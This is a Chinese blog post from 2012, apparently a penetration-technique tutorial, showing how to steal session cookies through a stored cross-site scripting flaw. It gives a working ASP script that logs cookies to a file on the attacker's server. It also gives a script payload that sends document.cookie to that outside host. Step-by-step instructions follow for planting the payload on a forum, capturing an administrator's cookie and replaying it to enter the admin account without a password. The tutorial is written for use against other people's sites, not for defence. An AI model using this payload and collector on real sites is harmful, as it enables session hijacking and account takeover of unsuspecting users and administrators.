加载中…
个人资料
  • 博客等级:
  • 博客积分:
  • 博客访问:
  • 关注人气:
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
正文 字体大小:

XSS获取cookie并利用

(2012-11-10 18:58:50)
标签:

xss利用

xss攻击实例

xss获取cookie

cookie攻击

it

分类: 渗透技术

XSS获取cookie并利用

 

获取cookie利用代码cookie.asp

<html>

<title>xx</title>

<body>

<%testfile = Server.MapPath("code.txt") //先构造一个路径也就是取网站根目录创造一个在根目录下的code.txt路径保存在testfile

msg = Request("msg")   //获取提交过来的msg变量也就是cookie

set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象

set thisfile = fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(""&msg&"")//code.txt中写入获取来的cookie

thisfile.close()   //关闭

set fs = nothing%>

</body>

</html>

把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080

 

XSS构造语句

<script>window.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)</script>

把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到http://10.65.20.196:8080/cookie.asp?msg='+document.cookie的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。

简单步骤如下:

1、在存在漏洞的论坛中发日志:

http://s10/mw690/714c124ftce321a98aa19&690

2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:

http://s7/mw690/714c124ftce321ab54ea6&690

3、这是没有账户前的登陆界面:

http://s3/mw690/714c124ftce321ac2f7b2&690

4、打开firefoxTamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据:

http://s13/mw690/714c124ftce321adce9bc&690

5、替换cookie后不用输用户名密码就顺利进入管理员账户了:

http://s12/mw690/714c124ftce321aeb779b&690


 

0

阅读 收藏 喜欢 打印举报/Report
  

新浪BLOG意见反馈留言板 欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 产品答疑

新浪公司 版权所有